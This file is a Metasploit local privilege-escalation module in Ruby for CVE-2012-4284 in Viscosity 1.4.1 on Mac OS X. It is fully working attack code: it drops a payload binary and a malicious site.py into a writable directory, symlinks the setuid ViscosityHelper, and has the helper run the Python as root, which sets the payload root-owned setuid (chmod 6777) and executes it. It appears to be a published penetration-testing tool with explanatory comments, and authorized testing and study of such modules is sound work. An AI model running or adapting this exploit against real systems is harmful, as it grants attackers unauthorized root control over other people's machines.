##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::OSX::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE

  # Module metadata (CVE-2012-4284, Viscosity 1.4.1 on Mac OS X) plus the
  # two datastore options the exploit reads: WritableDir and Viscosity.
  #
  # @param info [Hash] module info merged by the framework via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation',
          'Description' => %q{
            This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The
            vulnerability exists in the setuid ViscosityHelper, where an insufficient
            validation of path names allows execution of arbitrary python code as root.
            This module has been tested successfully on Viscosity 1.4.1 over Mac OS X
            10.7.5.
          },
          'References' => [
            [ 'CVE', '2012-4284' ],
            [ 'OSVDB', '84709' ],
            [ 'EDB', '20485' ],
            [ 'URL', 'http://blog.zx2c4.com/791' ]
          ],
          'License' => MSF_LICENSE,
          'Author' => [
            'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
            'juan vazquez' # Metasploit module
          ],
          'DisclosureDate' => '2012-08-12',
          'Platform' => 'osx',
          'SessionTypes' => [ 'shell' ],
          'Targets' => [
            [ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],
            [ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]
          ],
          # PrependSetresuid: the payload binary is launched from the root
          # python stub below, so the payload itself re-asserts uid 0.
          'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },
          'DefaultTarget' => 0,
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )

    register_options(
      [
        # These are not OptPath because it's a *remote* path
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
        OptString.new('Viscosity', [ true, 'Path to setuid ViscosityHelper executable', '/Applications/Viscosity.app/Contents/Resources/ViscosityHelper' ])
      ]
    )
  end

  # Remote directory that receives every dropped artifact.
  #
  # @return [String] the WritableDir option, coerced to a String
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Vulnerable only when the configured helper exists on the session and
  # `find` reports it as a root-owned file with the setuid bit set.
  #
  # @return [Msf::Exploit::CheckCode] Safe or Vulnerable
  def check
    helper = datastore['Viscosity']

    unless file?(helper)
      vprint_error 'ViscosityHelper not found'
      return CheckCode::Safe
    end

    # NOTE: the option value is interpolated unquoted into the remote shell
    # command, so a path containing spaces or shell metacharacters will not
    # be located correctly.
    setuid_listing = cmd_exec("find #{helper} -type f -user root -perm -4000")
    return CheckCode::Safe unless setuid_listing.include?('ViscosityHelper')

    CheckCode::Vulnerable
  end

  # Remove everything exploit dropped into WritableDir: the symlink, site.py,
  # the bytecode file written beside it (site.pyc), and the payload binary.
  # Only meaningful after exploit has assigned all four instance variables.
  def clean
    [@link, @python_file, "#{@python_file}c", @exe_file].each { |path| file_rm(path) }
  end

  # Drops the payload binary and a site.py into WritableDir, symlinks the
  # setuid helper next to them and runs the symlink; per the Description,
  # the helper's path handling then runs the dropped python as root, which
  # makes the payload root-owned setuid and execs it.
  #
  # Artifacts left on disk on success are listed in the final warning;
  # on a failed launch they are removed via clean.
  def exploit
    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable') unless check == CheckCode::Vulnerable
    fail_with(Failure::BadConfig, "#{base_dir} is not writable") unless writable?(base_dir)

    payload_name = rand_text_alpha(8)
    @exe_file = "#{base_dir}/#{payload_name}"
    print_status("Dropping executable #{@exe_file}")
    write_file(@exe_file, generate_payload_exe)

    # Runs as root inside the helper's python: re-assert uid/gid 0, make the
    # dropped binary root-owned with setuid/setgid bits, then exec it.
    loader_source = <<~EOF
      import os
      os.setuid(0)
      os.setgid(0)
      os.system("chown root #{@exe_file}")
      os.system("chmod 6777 #{@exe_file}")
      os.execl("#{@exe_file}", "#{payload_name}")
    EOF

    # Fixed name: presumably the helper picks up python's site module from
    # the symlink's directory, so the file name is not randomised.
    @python_file = "#{base_dir}/site.py"
    print_status("Dropping python #{@python_file}...")
    write_file(@python_file, loader_source)

    print_status('Creating symlink...')
    @link = "#{base_dir}/#{rand_text_alpha(8)}"
    cmd_exec("ln -s -f -v #{datastore['Viscosity']} #{@link}")

    print_status('Running...')
    begin
      cmd_exec(@link)
    rescue StandardError
      # Only the launch itself is guarded; earlier failures propagate as-is.
      print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...")
      clean
      return
    end

    print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}")
  end
end